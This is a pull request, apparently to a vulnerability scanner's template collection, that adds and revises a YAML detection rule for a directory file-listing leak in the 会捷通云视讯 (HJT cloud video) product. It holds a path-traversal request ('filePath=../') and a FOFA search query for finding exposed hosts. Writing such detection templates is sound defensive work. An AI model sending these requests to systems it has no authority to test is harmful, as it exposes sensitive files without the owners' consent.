### PR TITLE
Create him-directory-file-leak.yml

### DIFF
--- a/pocs/him-directory-file-leak.yml
+++ b/pocs/him-directory-file-leak.yml
@@ -3,10 +3,9 @@ rules:
   - method: GET
     path: "/him/api/rest/V1.0/system/log/list?filePath=../"
     expression: |
-      response.status == 200 && response.headers["Content-Type"].contains(string("application/json")) && response.body.bcontains(b"absolutePath") && response.body.bcontains(b"/var/logs/")
-
+      response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"\"absolutePath\":\"/var/logs/")
 detail:
   author: YekkoY
   description: "会捷通云视讯 list 目录文件泄露漏洞"
   links:
-    - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AF/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AFlist%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
+    - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%AD%E5%88%9B%E8%A7%86%E8%BF%85/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AF%20list%20%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html

--- a/pocs/him-directory-file-leak.yml
+++ b/pocs/him-directory-file-leak.yml
@@ -8,5 +8,5 @@ rules:
 detail:
   author: YekkoY
   description: "会捷通云视讯 list 目录文件泄露漏洞"
-  links: 
+  links:
     - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AF/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AFlist%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md

--- a/pocs/him-directory-file-leak.yml
+++ b/pocs/him-directory-file-leak.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: "/him/api/rest/V1.0/system/log/list?filePath=../"
     expression: |
-      response.status == 200 && response.body.bcontains(b"application/json") && response.body.bcontains(b"absolutePath") && response.body.bcontains(b"/var/logs/")
+      response.status == 200 && response.content_type.contains(b"application/json") && response.body.bcontains(b"absolutePath") && response.body.bcontains(b"/var/logs/")
 
 detail:
   author: YekkoY

--- a/pocs/him-directory-file-leak.yml
+++ b/pocs/him-directory-file-leak.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-him-directory-file-leak
+rules:
+  - method: GET
+    path: "/him/api/rest/V1.0/system/log/list?filePath=../"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"application/json") && response.body.bcontains(b"absolutePath") && response.body.bcontains(b"/var/logs/")
+
+detail:
+  author: YekkoY
+  description: "会捷通云视讯 list 目录文件泄露漏洞"
+  links: 
+    - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AF/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AFlist%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md

--- a/pocs/him-directory-file-leak.yml
+++ b/pocs/him-directory-file-leak.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: "/him/api/rest/V1.0/system/log/list?filePath=../"
     expression: |
-      response.status == 200 && response.content_type.contains(b"application/json") && response.body.bcontains(b"absolutePath") && response.body.bcontains(b"/var/logs/")
+      response.status == 200 && response.headers["Content-Type"].contains(string("application/json")) && response.body.bcontains(b"absolutePath") && response.body.bcontains(b"/var/logs/")
 
 detail:
   author: YekkoY

--- a/pocs/hjtcloud-directory-file-leak.yml
+++ b/pocs/hjtcloud-directory-file-leak.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-him-directory-file-leak
+name: poc-yaml-hjtcloud-directory-file-leak
 rules:
   - method: GET
     path: "/him/api/rest/V1.0/system/log/list?filePath=../"


### PR DESCRIPTION
会捷通云视讯 list 目录文件泄露漏洞

本 poc 是检测什么漏洞的
会捷通云视讯某个文件 list参数 存在目录文件泄露漏洞，攻击者通过漏洞可以获取一些敏感信息

测试环境
FOFA : body="/him/api/rest/v1.0/node/role"

备注
由于之前不太会git，是直接取消fork提交的，现在学会了。所以重新提交一下 